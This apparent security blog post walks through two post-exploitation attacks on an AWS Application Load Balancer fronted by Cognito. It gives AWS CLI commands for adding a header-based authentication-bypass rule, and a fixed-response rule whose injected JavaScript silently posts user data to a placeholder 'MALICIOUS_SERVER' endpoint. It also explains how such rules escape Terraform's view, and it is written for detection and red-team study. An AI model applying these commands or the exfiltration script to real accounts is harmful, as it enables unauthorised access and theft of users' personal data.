Rigging the Rules: Manipulating AWS ALB to Mine Sensitive Data

Adan
6 min readOct 24, 2023

--

In our ongoing exploration of post-exploitation attack vectors within AWS services, we’ve previously examined potential attacks against CloudFront and AppSync. This article turns the spotlight on the Application Load Balancer (ALB). As described by AWS, “Application Load Balancer operates at the request level (layer 7), routing traffic to targets (EC2 instances, containers, IP addresses, and Lambda functions) based on the content of the request.” So, just like AppSync and CloudFront, ALB is, most of the time, the initial touchpoint for user traffic, making it an excellent target for attackers aiming to intercept sensitive data.

Before going into the details, again, a clarification: the scenarios I present here and those from the other articles are not entirely new or groundbreaking. My goal is to highlight alternative techniques attackers might use once they have access to an AWS account with limited permissions.

Returning to the article, this time, we won’t look at two different scenarios but one scenario and two potential attack vectors. The scenario will be an ALB integrated with Cognito for user authentication. Authenticated requests will go to an EC2 instance running a simple Python application. This simple app contains an index with “Secret information” accessible only to authenticated users and a ‘/me’ endpoint revealing user data from Cognito. Here, we can see how the scenario works in normal conditions:

Figure 1. Normal use of the application

Let’s examine two potential attack scenarios:

Attack 1: Authentication Bypass

One technique an attacker might use to get access to the data served by the application is introducing a new rule bypassing the authentication for requests containing a specific header. For this, an attacker would:

  1. Get the load balancer ARN using the ‘describe load balancers’:
aws elbv2 describe-load-balancers

2. Get the load balancer listener ARN and the Target group ARN ( already configured in the default rule ):

aws elbv2 describe-listeners --load-balancer-arn <Load-Balancer-ARN>

3. Create a rule on the listener, with priority one and a condition that looks for a specific header and targets the same target group as the default rule.

aws elbv2 create-rule --listener-arn <Listener-ARN> --priority 1 --conditions file://conditions-pattern.json --actions Type=forward,TargetGroupArn=<Target-Group-ARN>

Where conditions-pattern.json is, for example:

[
{
"Field": "http-header",
"HttpHeaderConfig": {
"HttpHeaderName": "Bypass",
"Values": [
"true"
]
}
}
]

After this, a request without the bypass will be redirected to Cognito (to initiate the login flow):

Figure 2. Request without special headers

But a request with the header “Bypass: true” will go to the EC2 instance, allowing the attacker to read “Secret information”:

Figure 3. Request including the Bypass header

But if we go to /me, we won’t be able to get information from users as we do not have a token:

Figure 4. Request with the Bypass header failing to get the user’s data

Attack 2: Data Exfiltration via Injected JavaScript

The second attack vector is a bit more sophisticated. Here, the attacker injects malicious JavaScript into the user’s browser using the ALB’s ability to send fixed responses. Similar to what we did in the CloudFront scenario. In this scenario, there is a big difference, and it is that the ALB configures the cookie and has the HttpOnly flag set. Because of this, the attacker won’t be able to steal the cookie of the user, but it will be able to inject a Javascript that will exfiltrate the data. This tactic isn’t straightforward due to the need to maintain the application’s functionality and avoid alerting the user. For this attack to succeed, an attacker might use the following rules, each designed to trigger under certain circumstances:

Rule 1 checks for a ‘bypass’ cookie in the request. If this cookie exists, it means that the user session has already encountered the malicious script, thus forwarding the request to the original authentication process and eventually to the EC2 instance. This rule ensures that users can continue using the application normally after executing the malicious script.

Rule 2 looks for a custom ‘Bypass’ header in the request. When this header is present and set to ‘true,’ it indicates that the request comes from the malicious script attempting to retrieve data. The rule then allows these requests to pass through to the authentication process and the EC2 instance, enabling the script to collect user data without getting caught in a loop with the fixed-response rule.

Rule 3 is the critical rule that triggers the malicious script. It’s activated when the request contains the ALB’s authentication cookie but lacks the ‘bypass’ cookie. This condition typically occurs immediately after a user authenticates. The rule responds with fixed content, including malicious JavaScript. This script, executed in the user’s browser, silently calls the ‘/me’ endpoint using the ‘Bypass’ header, collects user data, and sends it to the attacker’s external server. It then sets the ‘bypass’ cookie and redirects the user back to their intended URL, making the attack almost invisible to the user. Here is an example of the action with the malicious JS:

[
{
"Type": "fixed-response",
"Order": 1,
"FixedResponseConfig": {
"MessageBody": "<html lang=\"en\"> <head> <script> async function getDataAndForward() { const response = await fetch('https://test.adanalvarez.click/me',{ headers: { 'bypass': 'true', }}); const data = await response.text(); document.cookie = \"bypass=true; path=/\"; const forwardResponse = await fetch('https://MALICIOUS_SERVER/receive', { method: 'POST', body: data }); window.location.href = window.location.pathname; } window.onload = getDataAndForward; </script> </head> <body> <h1>Loading...</h1> </body> </html>",
"StatusCode": "202",
"ContentType": "text/html"
}
}
]

After this, there will be the Default rule that doesn’t need modification. This rule is the fall-back rule if none of the above conditions are met, usually applying to new, unauthenticated users. It allows them to go through the standard authentication process, keeping the application’s legitimate front intact. In the end, the rules will look like this:

Figure 5. Example of configured rules for the attack

In the next GIF, we can see on the left hand the victim’s browser and on the right hand the attacker's server. The victim accesses the web and is redirected to the login screen (Cognito). After authentication, it goes back to the web, and the malicious script is executed (the loading page); after that, the user can navigate as usual. On the attacker’s side, we can see how when the malicious script is executed, it receives the data from /me.

Figure 6. View of the victim’s browser and the attacker’s server

The Stealth Factor in Terraform

An interesting aspect of these attacks is their invisibility to Terraform due to how Terraform manages certain AWS resources. Terraform treats rules within the AWS Application Load Balancer (ALB) as separate entities, managed using the aws_lb_listener_rule resource. This design means that when attackers introduce new rules directly via the AWS interface or CLI, these rules appear as independent resources outside of Terraform’s management scope.

Consequently, even as teams use Terraform to provision and manage their infrastructure, these externally added rules are not noticed. The infrastructure appears as expected from Terraform’s viewpoint, even though it’s silently compromised at the ALB level.

Figure 7. Terraform output after executing a plan

Conclusion

As we’ve seen once again, attackers don’t require a highly privileged account or access to the data directly to cause significant harm. Gaining access to a single AWS service, like ALB in this example, opens the door for considerable data theft via post-exploitation. This example shows again how important early detection is to restricting an attack’s spread and severity. If we can catch the malicious rules, we’ll be able to stop the attack and protect the data of our users.

Optional: Testing in a Controlled Environment

For those interested in testing the above or any of the other examples, I’ve shared Terraform files in this GitHub repository.

--

--

Adan

Cyber Security Engineer interested in Pentesting | Cloud Security | Adversary Emulation | Threat Hunting | Purple Teaming | SecDevOps - https://adan.cloud/